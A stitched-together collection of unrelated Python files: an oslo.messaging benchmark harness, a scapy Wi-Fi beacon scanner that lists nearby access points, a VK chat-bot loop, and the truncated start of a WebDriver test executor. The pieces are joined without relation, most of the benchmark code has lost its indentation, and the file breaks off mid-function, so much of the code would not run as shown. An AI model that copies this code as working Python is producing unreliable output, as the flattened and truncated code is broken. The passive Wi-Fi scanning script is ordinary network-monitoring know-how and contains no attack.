self.stop_time = stop_time
self.latency = latency or Stats()
self.msgs_ok = msgs_ok # count of successful msg transfers
self.msgs_fail = msgs_fail # count of failed msg transfers
self.errors = errors or dict() # error msgs and counts
@classmethod
def from_dict(cls, values):
if 'latency' in values:
values['latency'] = Stats.from_dict(values['latency'])
if 'errors' in values:
values['errors'] = values['errors'].copy()
return TestResults(**values)
def to_dict(self):
new_dict = dict()
for a in ['start_time', 'stop_time', 'msgs_ok', 'msgs_fail']:
new_dict[a] = getattr(self, a)
new_dict['latency'] = self.latency.to_dict()
new_dict['errors'] = self.errors.copy()
return new_dict
def error(self, reason):
key = str(reason)
self.errors[key] = self.errors.get(key, 0) + 1
def reset(self):
self.__init__()
def merge(self, results):
self.start_time = (min(self.start_time, results.start_time)
if self.start_time and results.start_time
else (self.start_time or results.start_time))
self.stop_time = (max(self.stop_time, results.stop_time)
if self.stop_time and results.stop_time
else (self.stop_time or results.stop_time))
self.msgs_ok += results.msgs_ok
self.msgs_fail += results.msgs_fail
self.latency.merge(results.latency)
for err in results.errors:
self.errors[err] = self.errors.get(err, 0) + results.errors[err]
def print_results(self):
if self.msgs_fail:
print("Error: %d message transfers failed"
% self.msgs_fail)
if self.errors:
print("Error: errors detected:")
for err in self.errors:
print(" '%s' (occurred %d times)" % (err, self.errors[err]))
total = self.msgs_ok + self.msgs_fail
print("Total Messages: %d" % total)
delta_time = self.stop_time - self.start_time
print("Test Interval: %f - %f (%f secs)" % (self.start_time,
self.stop_time,
delta_time))
if delta_time > 0.0:
print("Aggregate throughput: %f msgs/sec" %
(float(total) / delta_time))
latency = self.latency
if latency.count:
print("Latency %d samples (msecs): Average %f StdDev %f"
" Min %f Max %f"
% (latency.count,
latency.average(), latency.std_deviation(),
latency.min, latency.max))
print("Latency Distribution: ")
latency.print_distribution()
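# Illustrative sketch (not part of the original module): merging per-client results the
# way the controller aggregates them, using made-up message counts and timestamps.
def _example_merge_results():
    total = TestResults()
    client_a = TestResults(start_time=100.0, stop_time=102.0, msgs_ok=100)
    client_b = TestResults(start_time=100.5, stop_time=103.0, msgs_ok=80, msgs_fail=2)
    for partial in (client_a, client_b):
        total.merge(partial)
    total.print_results()    # 182 messages over the 3-second aggregate interval
    return total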
class _Base(object):
"""Common base for all ombt2 processes. Establishes a connection to the
control message bus and a subscription for control messages
"""
def __init__(self, cfg, ctl_url, topic, output, name, unique=False,
kind=None, timeout=None):
super(_Base, self).__init__()
self._finished = threading.Event()
self._timeout = timeout
if kind is None:
ctl_topic = CONTROLLER_TOPIC % (topic
if not unique else 'singleton')
self.kind = "Controller"
else:
ctl_topic = CLIENT_TOPIC % ((kind, topic)
if not unique else (kind, 'singleton'))
self.kind = kind
self.name = name or 'ombt-%s-%s-%s-%s-%s' % (topic,
kind,
socket.gethostname(),
os.getpid(),
uuid.uuid4().hex)
self.ctl_url = ctl_url
self.ctl_tport = om.get_rpc_transport(cfg.CONF,
url=ctl_url)
# My address and subscription for receiving control commands/responses
self.ctl_target = om.Target(exchange=CONTROL_EXCHANGE,
topic=ctl_topic,
server=self.name)
self._ctl_server = om.get_rpc_server(self.ctl_tport,
target=self.ctl_target,
endpoints=[self],
executor="threading")
self._ctl_server.start()
if output is not None:
try:
self._output = FileOutputter(output)
except Exception as exc:
logging.error("Cannot open output file %s: %s!",
output, str(exc))
self._output = NullOutputter()
else:
self._output = NullOutputter()
def start(self):
# blocks until connection to the control bus is active
ready = False
attempts = 0
logging.debug("%s connecting to the control message bus...", self.name)
# call my "self_ready" method until it returns successfully.
# this indicates the connection to the control bus is active.
client = om.RPCClient(self.ctl_tport,
target=self.ctl_target,
timeout=2)
while not ready and attempts < 25:
try:
ready = client.call({}, 'self_ready')
except om.MessagingTimeout:
attempts += 1
if not ready:
raise Exception("Unable to contact message bus")
logging.debug("%s is listening", self.name)
def wait(self, timeout=None):
# blocks until client completes shutdown
return self._finished.wait(timeout)
def _do_shutdown(self):
self._ctl_server.stop()
self._ctl_server.wait()
self._finished.set()
logging.debug("%s has shut down", self.name)
#
# RPC calls:
#
def shutdown(self, ctxt):
# cannot synchronously shutdown server since this call is dispatched by
# the server...
threading.Thread(target=self._do_shutdown).start()
def self_ready(self, ctxt):
# simple ping to determine when message bus is connected
return True
class _Client(_Base):
"""Common base for non-controller clients. Defines RPC calls that are
invoked by the Controller to control the tests.
"""
def __init__(self, cfg, ctl_url, topic, kind, timeout, name,
unique=False, output=None):
# listen on 'client-$topic' for controller commands:
super(_Client, self).__init__(cfg, ctl_url, topic, output, name,
unique, kind, timeout)
self.topic = CLIENT_TOPIC % ((kind, topic)
if not unique else (kind, 'singleton'))
self.results = TestResults()
self._results_lock = threading.Lock()
self._output.write('{"client-name": "%(client)s",'
' "kind": "%(kind)s"}\n'
% {'client': self.name,
'kind': kind})
#
# RPC Calls
#
def client_ping(self, ctxt, reply_addr):
# invoked by controller via rpc-cast to roll-call available clients
logging.debug("Client ping received (%s)", self.name)
target = om.Target(**reply_addr)
ctrl = om.RPCClient(self.ctl_tport, target=target,
timeout=self._timeout)
try:
ctrl.call({}, "client_pong", kind=self.kind, name=self.name)
except Exception as exc:
err = str(exc)
logging.error("client pong call failed: %s", err)
self.error(err)
else:
logging.debug("Client pong sent (%s) (%s)", self.name, target)
class _TestClient(_Client):
"""Base class for Notifier and RPC clients
"""
def __init__(self, cfg, ctl_url, topic, kind, name, timeout, unique=False,
output=None):
super(_TestClient, self).__init__(cfg, ctl_url, topic, kind, timeout,
name, unique, output)
    # helper to execute func(timestamp, msgid) count times, pausing `pause` seconds
    # between invocations. Provides extra logging if verbose
def _execute(self, func, count=0, pause=0, verbose=False):
stop = False
msgid = uuid.uuid4().hex
seq = 0
self.results.start_time = now()
while not stop:
err = None
ts = now()
try:
func(ts, "%s:%d" % (msgid, seq))
except Exception as exc:
self.results.msgs_fail += 1
err = str(exc)
self.results.error(err)
logging.error("Test client failed to send message: %s", err)
else:
self.results.msgs_ok += 1
done = now()
self.results.latency.update((done - ts) * 1000)
self._output.write('{"id": "%(msgid)s", "start": %(start)f,'
' "stop": %(stop)f%(error)s}\n'
% {'msgid': "%s:%d" % (msgid, seq),
'start': ts,
'stop': done,
'error':
(', "error": "%s"' % err) if err else ""
}
)
seq += 1
if pause:
time.sleep(pause)
if count and self.results.latency.count >= count:
stop = True
self.results.stop_time = now()
#
# RPC Calls
#
@abc.abstractmethod
def run_test(self, ctxt, test, kwargs, reply_addr):
"""Called by the controller to have the client run test 'test' with
arguments kwargs. When the test completes the client sends the results
to the controller at 'reply_addr' by calling its 'client_result'
method. Note: this is an RPC method that is invoked by the test
controller via a fanout 'cast' - not 'call' (the controller does not
block for results)
"""
class _TestServer(_Client):
"""Base class for Listener and RPC servers
"""
def __init__(self, cfg, ctl_url, topic, kind, name, timeout, unique=False,
output=None):
super(_TestServer, self).__init__(cfg, ctl_url, topic, kind, timeout,
name, unique, output)
#
# Controller RPC Calls
#
def get_server_results(self, ctxt, reply_addr):
"""Called by the controller to gather server side test data. May be
called repeatedly until the test completes. Note this is invoked by
the controller via a fanout 'cast' - not a 'call' (the controller does
not block for results)
"""
with self._results_lock:
results = self.results.to_dict()
self.results.reset()
controller = om.RPCClient(self.ctl_tport,
om.Target(**reply_addr),
timeout=self._timeout)
try:
controller.call({}, 'client_result', name=self.name,
kind=self.kind, results=results)
except Exception as exc:
# I don't think recovery is possible as the call may be in-doubt.
# For now simply let folks know the results may be invalid
err = str(exc)
logging.error("%s failed to report results!"
" Test results may be invalid!"
" Error: %s", err)
else:
logging.debug("Server %s test results sent", self.name)
class RPCTestClient(_TestClient):
"""Runs the RPC tests against the RPCTestServer
"""
def __init__(self, cfg, ctl_url, test_url, topic, name, timeout,
unique=False, output=None):
super(RPCTestClient, self).__init__(cfg, ctl_url, topic, RPC_CLIENT,
name, timeout, unique, output)
# for calling the test RPC server(s):
target = om.Target(exchange=RPC_EXCHANGE,
topic=RPC_TOPIC % topic)
fanout_target = om.Target(exchange=RPC_EXCHANGE,
topic=RPC_TOPIC % topic,
fanout=True)
tport = (self.ctl_tport
if test_url == self.ctl_url
else om.get_rpc_transport(cfg.CONF, url=test_url))
self._rpc_client = om.RPCClient(tport,
target=target,
timeout=timeout)
self._fanout_client = om.RPCClient(tport,
target=fanout_target,
timeout=timeout)
#
# RPC Calls:
#
def run_test(self, ctxt, test, kwargs, reply_addr):
func = None
verbose = kwargs.get("verbose", False)
pause = kwargs.get("pause", 0)
data = kwargs.get("data", "")
count = kwargs.get("count", 0)
if test == "test_call":
func = lambda ts, msgid: self._rpc_client.call({}, 'echo',
data=data,
timestamp=ts,
msgid=msgid)
elif test == "test_cast":
func = lambda ts, msgid: self._rpc_client.cast({}, 'noop',
data=data,
timestamp=ts,
msgid=msgid)
elif test == "test_fanout":
func = lambda ts, msgid: self._fanout_client.cast({}, 'noop',
data=data,
timestamp=ts,
msgid=msgid)
else:
logging.error("Client %s ignoring unknown test %s",
self.name, test)
return
self._output.write('{"test-name": "%(name)s",'
' "test-start": %(start)f}\n'
% {'name': test, 'start': now()})
controller = om.RPCClient(self.ctl_tport,
om.Target(**reply_addr),
timeout=self._timeout)
logging.debug("Client %s starting test %s ...", self.name, test)
# Before running the test, try to ping the server. This will force a
# link setup so the first latency-timed message will not be blocked
# waiting for the setup to complete.
try:
self._rpc_client.call({}, "self_ready")
except Exception as exc:
logging.warning("Client %s is unable to reach RPC server: %s",
self.name, str(exc))
self.results.error(str(exc))
# keep going, perhaps the test will not fail...
self._execute(func, count, pause, verbose)
self._output.write('{"test-end": %f}\n' % now())
logging.debug("Client %s test %s finished, sending results...",
self.name, test)
try:
controller.call({}, 'client_result', name=self.name,
kind=self.kind, results=self.results.to_dict())
except Exception as exc:
# I don't think recovery is possible as the call may be in-doubt.
# For now simply let folks know the results may be invalid
logging.error("%s failed to report results!"
" Test results may be invalid!"
" Error: %s", RPC_CLIENT, str(exc))
else:
logging.debug("Client %s test %s results sent", self.name, test)
self.results.reset()
class RPCTestServer(_TestServer):
"""Response to RPC requests from RPCTestClient
"""
def __init__(self, cfg, ctl_url, test_url, topic, executor, name, timeout,
unique=False, output=None):
super(RPCTestServer, self).__init__(cfg, ctl_url, topic, RPC_SERVER,
name, timeout, unique, output)
target = om.Target(exchange=RPC_EXCHANGE,
topic=RPC_TOPIC % topic,
server=self.name)
tport = (self.ctl_tport
if test_url == self.ctl_url
else om.get_rpc_transport(cfg.CONF, url=test_url))
self._rpc_server = om.get_rpc_server(tport,
target,
[self],
executor=executor)
self._rpc_server.start()
def _update_stats(self, timestamp, msgid):
# given timestamp from arriving message
ts = now()
self._output.write('{"id": "%s", "start": %f, "recv": %f'
% (msgid, timestamp, ts))
if timestamp > ts:
logging.error("Clock error detected:"
" send time (%f) after arrival time (%f)"
" test results will be invalid!",
timestamp, ts)
with self._results_lock:
self.results.error("Clocks not synchronized")
self.results.msgs_fail += 1
self._output.write(', "error": "unsynchronized clocks"\n')
else:
with self._results_lock:
self.results.start_time = (min(self.results.start_time, ts)
if self.results.start_time else ts)
self.results.stop_time = (max(self.results.stop_time, ts)
if self.results.stop_time else ts)
self.results.msgs_ok += 1
self.results.latency.update((ts - timestamp) * 1000)
self._output.write('}\n')
#
# Controller RPC Calls:
#
def shutdown(self, ctxt):
self._rpc_server.stop()
self._rpc_server.wait()
super(RPCTestServer, self).shutdown(ctxt)
#
# Test RPC Calls:
#
def noop(self, ctxt, data, timestamp, msgid):
# for cast testing - called by RPCTestClient, no return value
self._update_stats(timestamp, msgid)
logging.debug("RPCServer.noop(timestamp=%s)", timestamp)
def echo(self, ctxt, data, timestamp, msgid):
# for call testing - called by RPCTestClient
self._update_stats(timestamp, msgid)
logging.debug("RPCServer.echo(timestamp=%s)", timestamp)
return data
class TestNotifier(_TestClient):
"""Client for issuing Notification calls to the TestListener
"""
def __init__(self, cfg, ctl_url, test_url, topic, name, timeout,
output=None):
super(TestNotifier, self).__init__(cfg,
ctl_url,
topic,
NOTIFIER,
name,
timeout,
                                           output=output)
# for notifying the test listener:
om.set_transport_defaults(control_exchange=NOTIFY_EXCHANGE)
tport = om.get_notification_transport(cfg.CONF, url=test_url)
topic = NOTIFY_TOPIC % topic
self._notifier = om.notify.notifier.Notifier(tport,
self.name,
driver='messaging',
topics=[topic])
#
# RPC Calls:
#
def run_test(self, ctxt, test, kwargs, reply_addr):
if test != 'test_notify':
# ignore other tests, like rpc-call, etc
return
verbose = kwargs.get("verbose", False)
pause = kwargs.get("pause", 0)
data = kwargs.get("data", "")
count = kwargs.get("count", 0)
severity = kwargs.get("severity", "debug")
controller = om.RPCClient(self.ctl_tport,
om.Target(**reply_addr),
timeout=self._timeout)
logging.debug("Client %s starting test %s ...", self.name, test)
func = getattr(self._notifier, severity)
payload = {'payload': data}
def test_func(timestamp, msgid):
payload['timestamp'] = timestamp
payload['msgid'] = msgid
func({}, "notification-test", payload)
self._output.write('{"test-name": "test_notify",'
' "test-start": %(start)f}\n'
% {'start': now()})
self._execute(test_func, count, pause, verbose)
self._output.write('{"test-end": %f}\n' % now())
logging.debug("Client %s test %s finished, sending results...",
self.name, test)
with self._results_lock:
results = self.results.to_dict()
self.results.reset()
try:
controller.call({}, 'client_result', name=self.name,
kind=self.kind, results=results)
except Exception as exc:
# I don't think recovery is possible as the call may be in-doubt.
# For now simply let folks know the results may be invalid
logging.error("%s failed to report results!"
" Test results may be invalid!"
" Error: %s", str(exc))
else:
logging.debug("Client %s test %s results sent", self.name, test)
class TestListener(_TestServer):
def __init__(self, cfg, ctl_url, test_url, topic, executor, name, timeout,
pool=None, output=None):
super(TestListener, self).__init__(cfg,
ctl_url,
topic,
LISTENER,
name,
                                           timeout, output=output)
target = om.Target(exchange=NOTIFY_EXCHANGE,
topic=NOTIFY_TOPIC % topic,
server=self.name)
om.set_transport_defaults(control_exchange=NOTIFY_EXCHANGE)
tport = om.get_notification_transport(cfg.CONF, url=test_url)
self._listener = om.get_notification_listener(tport,
[target],
[self],
executor=executor,
pool=pool)
self._listener.start()
#
# Controller RPC Calls:
#
def shutdown(self, ctxt):
self._listener.stop()
self._listener.wait()
super(TestListener, self).shutdown(ctxt)
#
# Notifications:
#
def _report(self, severity, ctx, publisher, event_type, payload, metadata):
ts = now()
logging.debug("%s Notification %s:%s:%s:%s:%s", self.name, severity,
publisher, event_type, payload, metadata)
timestamp = payload['timestamp']
msgid = payload['msgid']
self._output.write('{"id": "%(msgid)s", "start": %(start)f,'
' "recv": %(recv)f'
% {'msgid': msgid, 'start': timestamp, 'recv': ts})
if timestamp > ts:
logging.error("Clock error detected:"
" send time (%f) after arrival time (%f)"
" test results will be invalid!",
timestamp, ts)
with self._results_lock:
self.results.error("Clocks not synchronized")
self.results.msgs_fail += 1
self._output.write(', "error": "unsynchronized clocks"\n')
else:
with self._results_lock:
self.results.start_time = (min(self.results.start_time, ts)
if self.results.start_time else ts)
self.results.stop_time = (max(self.results.stop_time, ts)
if self.results.stop_time else ts)
self.results.latency.update((ts - timestamp) * 1000)
self.results.msgs_ok += 1
self._output.write('}\n')
def debug(self, ctx, publisher, event_type, payload, metadata):
self._report("debug", ctx, publisher, event_type, payload, metadata)
def audit(self, ctx, publisher, event_type, payload, metadata):
self._report("audit", ctx, publisher, event_type, payload, metadata)
def critical(self, ctx, publisher, event_type, payload, metadata):
self._report("critical", ctx, publisher, event_type, payload, metadata)
def error(self, ctx, publisher, event_type, payload, metadata):
self._report("error", ctx, publisher, event_type, payload, metadata)
def info(self, ctx, publisher, event_type, payload, metadata):
self._report("info", ctx, publisher, event_type, payload, metadata)
def warn(self, ctx, publisher, event_type, payload, metadata):
self._report("warn", ctx, publisher, event_type, payload, metadata)
class Controller(_Base):
"""The test controller
"""
def __init__(self, cfg, ctl_url, topic, timeout, unique=False, idle=2,
output=None):
# each controller has a unique topic not to be confused
# with future or past controller instances
self.topic = topic
self._idle = idle
self.unique = unique
super(Controller, self).__init__(cfg, ctl_url, topic, output,
unique=False,
name=None,
kind=None,
timeout=timeout)
self._total_minions = 0
self._queue = queue.Queue()
# count of clients per type
self._minions = dict([(k, 0) for k in MESSAGING_CLIENT_TYPES])
# aggregated client results per type
self._results = dict([(k, TestResults())
for k in MESSAGING_CLIENT_TYPES])
# control rpc client for each type:
self._clients = dict()
def start(self):
super(Controller, self).start()
logging.debug("Polling for clients...")
reply = {'exchange': self.ctl_target.exchange,
'topic': self.ctl_target.topic,
'server': self.ctl_target.server}
for kind in MESSAGING_CLIENT_TYPES:
target = om.Target(exchange=CONTROL_EXCHANGE,
topic=CLIENT_TOPIC %
((kind, self.topic)
if not self.unique else (kind, 'singleton')),
fanout=True)
self._clients[kind] = om.RPCClient(self.ctl_tport, target=target)
self._clients[kind].cast({}, 'client_ping', reply_addr=reply)
# wait until no more clients reply to the ping
# (things are idle)
_wait_stabilize(self._idle, lambda: self._total_minions)
def shutdown(self):
"""Shutdown this Controller
"""
super(Controller, self).shutdown({})
self.wait()
def shutdown_clients(self):
"""Shutdown all clients listening to $topic
"""
for kind in MESSAGING_CLIENT_TYPES:
self._clients[kind].cast({}, 'shutdown')
time.sleep(1.0)
def run_call_test(self, count, data, verbose, pause):
clients = self._minions[RPC_CLIENT]
servers = self._minions[RPC_SERVER]
kwargs = {'verbose': verbose,
'pause': pause,
'data': data,
'count': count}
self._run_test(RPC_CLIENT, 'test_call', kwargs)
# note: set the poll time to 2x the client's pause between calls,
# otherwise we're polling too frequently
self._query_servers(RPC_SERVER, pause * 2, count * clients)
print("RPC call test results")
print("%d RPC clients, %d RPC Servers (%d total)"
% (clients, servers, clients + servers))
print("\n")
print("Aggregated RPC Client results:")
print("------------------------------")
self._results[RPC_CLIENT].print_results()
print("\n")
print("Aggregated RPC Server results:")
print("------------------------------")
self._results[RPC_SERVER].print_results()
def run_cast_test(self, count, data, verbose, pause, delay):
clients = self._minions[RPC_CLIENT]
servers = self._minions[RPC_SERVER]
kwargs = {'verbose': verbose,
'pause': pause,
'data': data,
'count': count}
self._run_test(RPC_CLIENT, 'test_cast', kwargs)
# cast are async, wait a bit for msgs to propagate
time.sleep(delay)
# note: set the poll time to 2x the client's pause between calls,
# otherwise we're polling too frequently
self._query_servers(RPC_SERVER, pause * 2, count * clients)
print("RPC cast test results")
print("%d RPC clients, %d RPC Servers (%d total)"
% (clients, servers, clients + servers))
print("\n")
print("Aggregated RPC Client results:")
print("------------------------------")
self._results[RPC_CLIENT].print_results()
print("\n")
print("Aggregated RPC Server results:")
print("------------------------------")
self._results[RPC_SERVER].print_results()
def run_fanout_test(self, count, data, verbose, pause,
delay):
clients = self._minions[RPC_CLIENT]
servers = self._minions[RPC_SERVER]
kwargs = {'verbose': verbose,
'pause': pause,
'data': data,
'count': count}
self._run_test(RPC_CLIENT, 'test_fanout', kwargs)
# fanouts are async, wait a bit for msgs to propagate
time.sleep(delay)
# note: set the poll time to 2x the client's pause between calls,
# otherwise we're polling too frequently
self._query_servers(RPC_SERVER, pause * 2,
count * clients * servers)
print("RPC fanout test results")
print("%d RPC clients, %d RPC Servers (%d total)"
% (clients, servers, clients + servers))
print("\n")
print("Aggregated RPC Client results:")
print("------------------------------")
self._results[RPC_CLIENT].print_results()
print("\n")
print("Aggregated RPC Server results:")
print("------------------------------")
self._results[RPC_SERVER].print_results()
start = self._results[RPC_CLIENT].start_time
stop = self._results[RPC_SERVER].stop_time
print("\n")
print("Fanout propagation delay:")
print("-------------------------")
print(" First client transmit time: %f" % start)
print(" Last server receive time: %f" % stop)
print(" Duration (secs): %f" % (stop - start))
def run_notification_test(self, count, data, severity, verbose, pause,
delay):
clients = self._minions[NOTIFIER]
servers = self._minions[LISTENER]
kwargs = {'verbose': verbose,
'pause': pause,
'data': data,
'count': count,
'severity': severity}
self._run_test(NOTIFIER, 'test_notify', kwargs)
# notifications are async, wait a bit for msgs to propagate
time.sleep(delay)
# note: set the poll time to 2x the client's pause between calls,
# otherwise we're polling too frequently
self._query_servers(LISTENER, pause * 2, count * clients)
print("Notification test results")
print("%d Notifiers, %d Listeners (%d total)"
% (clients, servers, clients + servers))
print("\n")
print("Aggregated Notifier (Client) results:")
print("------------------------------------")
self._results[NOTIFIER].print_results()
print("\n")
print("Aggregated Listener (Server) results:")
print("-------------------------------------")
self._results[LISTENER].print_results()
def _run_test(self, kind, test, kwargs):
"""Tell the messaging clients to run a test. When the client completes
it will call the 'client_result' method below.
"""
count = self._minions[kind]
if count == 0:
raise Exception("No %s clients visible" % kind)
reply = {'exchange': self.ctl_target.exchange,
'topic': self.ctl_target.topic,
'server': self.ctl_target.server}
# tell 'kind' clients to run the test
self._clients[kind].cast({}, 'run_test',
test=test,
kwargs=kwargs,
reply_addr=reply)
results_per_client = dict()
# wait for the clients to send results
while count:
try:
name, ckind, results = self._queue.get(timeout=self._timeout)
except queue.Empty:
raise Exception("%s test timed out: no response from clients!"
% test)
results_per_client[name] = results.to_dict()
self._results[ckind].merge(results)
if ckind == kind:
count -= 1
else:
# TODO(kgiusti) uh, is this a problem?
logging.warning("Huh? results from %s while expecting a %s",
ckind, kind)
self._output.write(json.dumps(results_per_client) + '\n')
def _query_servers(self, kind, pause, total):
"""Ask the servers for any data gathered during the test. The servers
will respond by calling the 'client_result' method below. Once the
servers stop reporting new statistics the query is done.
:param kind: the type of server to query - RPC or LISTENER
:type kind: str
:param pause: time in seconds to wait between each server poll. Should
be at least twice the client's inter-message pause time.
:type pause: float
:param total: total number of messages expected to be received by all
servers
"""
if self._minions[kind] == 0:
raise Exception("No %s servers visible" % kind)
# avoid hammering the servers if no pause given
pause = max(pause, 0.250) if pause else 0.250
server_results = self._results[kind]
reply = {'exchange': self.ctl_target.exchange,
'topic': self.ctl_target.topic,
'server': self.ctl_target.server}
logging.debug("Querying servers...")
results_per_server = dict()
done = False
start = now()
while not done and abs(now() - start) < self._timeout:
# tell 'kind' servers to return results
self._clients[kind].cast({}, 'get_server_results',
reply_addr=reply)
# wait for the servers to send results
count = self._minions[kind]
seen = 0
while count:
try:
_ = self._queue.get(timeout=self._timeout)
name, ckind, results = _
except queue.Empty:
raise Exception("%s test timed out: no response from"
" servers!" % kind)
if ckind != kind:
# TODO(kgiusti): uh, is this a problem?
logging.warning("Huh? results from %s while expecting %s",
ckind, kind)
continue
if name not in results_per_server:
results_per_server[name] = results
else:
results_per_server[name].merge(results)
server_results.merge(results)
seen += results.msgs_ok + results.msgs_fail
count -= 1
# exit loop once the expected number of messages have been received
# by the servers, or the test times out
done = server_results.msgs_ok + server_results.msgs_fail >= total
if not done:
time.sleep(pause)
if seen == 0:
# no replies: try pausing longer next time
pause = min(pause * 2.0, self._timeout)
if not done:
logging.error("Test timed out - not all messages accounted for")
results_per_server = dict([[k, v.to_dict()]
for k, v in results_per_server.items()])
self._output.write(json.dumps(results_per_server) + '\n')
logging.debug("... servers queried")
#
# RPC calls:
#
def client_pong(self, ctxt, kind, name):
# A client 'name' is checking in
if kind not in self._minions:
self._minions[kind] = 0
self._minions[kind] += 1
self._total_minions += 1
logging.debug("New %s detected (%s) - %d total clients found",
kind, name, self._total_minions)
return True
def client_result(self, ctxt, name, kind, results):
# A test client is reporting a test result in response to the above
# _run_test method.
logging.debug("%s results received from %s", (kind, name))
try:
self._queue.put((name, kind, TestResults.from_dict(results)))
except Exception as exc:
logging.error("Invalid TestResult from %s:%s (%s)",
kind, str(exc), str(results))
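

# Illustrative sketch (not part of the original tool): one plausible way to
# drive the Controller defined above.  The cfg, ctl_url and output arguments
# are placeholders; the real tool derives them from its command line, which
# is not shown in this file.
def _example_controller_session(cfg, ctl_url, output):
    controller = Controller(cfg, ctl_url, topic='perf-test',
                            timeout=60, output=output)
    controller.start()  # ping the clients and wait for the count to stabilize
    try:
        controller.run_call_test(count=100, data='x' * 1024,
                                 verbose=False, pause=0)
    finally:
        controller.shutdown_clients()  # broadcast 'shutdown' to the clients
        controller.shutdown()          # then stop the controller itself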
|
wifi_scanner.py
|
from scapy.all import *
from threading import Thread
import pandas
import time
import os
import sys
# initialize the networks dataframe that will contain all access points nearby
networks = pandas.DataFrame(columns=["BSSID", "SSID", "dBm_Signal", "Channel", "Crypto"])
# set the index BSSID (MAC address of the AP)
networks.set_index("BSSID", inplace=True)
def callback(packet):
if packet.haslayer(Dot11Beacon):
# extract the MAC address of the network
bssid = packet[Dot11].addr2
# get the name of it
ssid = packet[Dot11Elt].info.decode()
try:
dbm_signal = packet.dBm_AntSignal
        except AttributeError:
            # some beacon frames do not expose a radiotap dBm_AntSignal field
            dbm_signal = "N/A"
# extract network stats
stats = packet[Dot11Beacon].network_stats()
# get the channel of the AP
channel = stats.get("channel")
# get the crypto
crypto = stats.get("crypto")
networks.loc[bssid] = (ssid, dbm_signal, channel, crypto)
def print_all():
while True:
os.system("clear")
print(networks)
time.sleep(0.5)
def change_channel():
ch = 1
while True:
os.system(f"iwconfig {interface} channel {ch}")
# switch channel from 1 to 14 each 0.5s
ch = ch % 14 + 1
time.sleep(0.5)
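
# Optional helper (illustrative only, never called below): beacon frames are
# only visible when the wireless interface is in monitor mode.  The exact
# commands vary between drivers and distributions; the ip/iw invocations here
# are one common way to do it and may need adjusting for your setup.
def enable_monitor_mode(iface):
    os.system(f"ip link set {iface} down")
    os.system(f"iw {iface} set monitor control")
    os.system(f"ip link set {iface} up")
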
if __name__ == "__main__":
# interface name, check using iwconfig
interface = sys.argv[1]
# start the thread that prints all the networks
printer = Thread(target=print_all)
printer.daemon = True
printer.start()
# start the channel changer
channel_changer = Thread(target=change_channel)
channel_changer.daemon = True
channel_changer.start()
# start sniffing
sniff(prn=callback, iface=interface)
|
main.py
|
import vk_api
from vk_api import bot_longpoll
import assets.View.MainView as mainView
import threading
import json
token = open('./assets/token.cred').readline().replace('\n', '')
views = []
userIds = []
apiViews = []
apiIDs = []
def parseStuff(userId, event):
print(json.dumps(event['object']))
if event['object']['from_id'] >= 0:
for view in views:
if view.vkID == userId:
if view.ParseEvent(event['object']) == True:
views.remove(view)
userIds.remove(view.vkID)
break
else:
# TODO: parse bots conversation
pass
def parseAPIReq(userId, event):
for apiView in apiViews:
if apiView.vkID == userId:
if apiView.ParseEvent(event):
apiViews.remove(apiView)
apiIDs.remove(userId)
pass
def main():
try:
session = vk_api.VkApi(token= token)
lps = bot_longpoll.VkBotLongPoll(session, 192912095)
for event in lps.listen():
for view in views:
if view.vkID not in userIds:
userIds.append(view.vkID)
rawEvent = event.raw
userId = rawEvent['object']['from_id']
if event.raw['object']['from_id'] >= 0:
mV = mainView.MainView(session= session, userId= userId, event= rawEvent)
if mV.vkID not in userIds:
views.append(mV)
userIds.append(mV.vkID)
a = threading.Thread(target= parseStuff, kwargs= {'event': rawEvent, "userId": userId})
a.start()
else:
userId = rawEvent['object']['peer_id']
# apiV = APIView.APIView(session, userId)
# if apiV.vkID not in apiIDs:
# apiViews.append(apiV)
# apiIDs.append(userId)
# b = threading.Thread(target= parseAPIReq, kwargs= {'userId': userId, 'event': event})
# b.start()
pass
    except Exception as e:
        print(str(e))


# keep the long-poll loop running: restart main() if it exits or crashes
while True:
    main()
|
executorwebdriver.py
|
import json
import os
import socket
import threading
import time
import traceback
import urlparse
import uuid
from .base import (CallbackHandler,
RefTestExecutor,
RefTestImplementation,
TestharnessExecutor,
extra_timeout,
strip_server)
from .protocol import (BaseProtocolPart,
TestharnessProtocolPart,
Protocol,
SelectorProtocolPart,
ClickProtocolPart,
SendKeysProtocolPart,
ActionSequenceProtocolPart,
TestDriverProtocolPart)
from ..testrunner import Stop
import webdriver as client
here = os.path.dirname(__file__)
class WebDriverBaseProtocolPart(BaseProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def execute_script(self, script, async=False):
method = self.webdriver.execute_async_script if async else self.webdriver.execute_script
return method(script)
def set_timeout(self, timeout):
try:
self.webdriver.timeouts.script = timeout
except client.WebDriverException:
# workaround https://bugs.chromium.org/p/chromedriver/issues/detail?id=2057
body = {"type": "script", "ms": timeout * 1000}
self.webdriver.send_session_command("POST", "timeouts", body)
@property
def current_window(self):
return self.webdriver.window_handle
def set_window(self, handle):
self.webdriver.window_handle = handle
def wait(self):
while True:
try:
self.webdriver.execute_async_script("")
except (client.TimeoutException, client.ScriptTimeoutException):
pass
except (socket.timeout, client.NoSuchWindowException,
client.UnknownErrorException, IOError):
break
except Exception as e:
self.logger.error(traceback.format_exc(e))
break
class WebDriverTestharnessProtocolPart(TestharnessProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
self.runner_handle = None
with open(os.path.join(here, "runner.js")) as f:
self.runner_script = f.read()
def load_runner(self, url_protocol):
if self.runner_handle:
self.webdriver.window_handle = self.runner_handle
url = urlparse.urljoin(self.parent.executor.server_url(url_protocol),
"/testharness_runner.html")
self.logger.debug("Loading %s" % url)
self.webdriver.url = url
self.runner_handle = self.webdriver.window_handle
format_map = {"title": threading.current_thread().name.replace("'", '"')}
self.parent.base.execute_script(self.runner_script % format_map)
def close_old_windows(self):
handles = [item for item in self.webdriver.handles if item != self.runner_handle]
for handle in handles:
try:
self.webdriver.window_handle = handle
self.webdriver.close()
except client.NoSuchWindowException:
pass
self.webdriver.window_handle = self.runner_handle
return self.runner_handle
def get_test_window(self, window_id, parent, timeout=5):
"""Find the test window amongst all the open windows.
This is assumed to be either the named window or the one after the parent in the list of
window handles
:param window_id: The DOM name of the Window
:param parent: The handle of the runner window
:param timeout: The time in seconds to wait for the window to appear. This is because in
some implementations there's a race between calling window.open and the
window being added to the list of WebDriver accessible windows."""
test_window = None
end_time = time.time() + timeout
while time.time() < end_time:
try:
# Try using the JSON serialization of the WindowProxy object,
# it's in Level 1 but nothing supports it yet
win_s = self.webdriver.execute_script("return window['%s'];" % window_id)
win_obj = json.loads(win_s)
test_window = win_obj["window-fcc6-11e5-b4f8-330a88ab9d7f"]
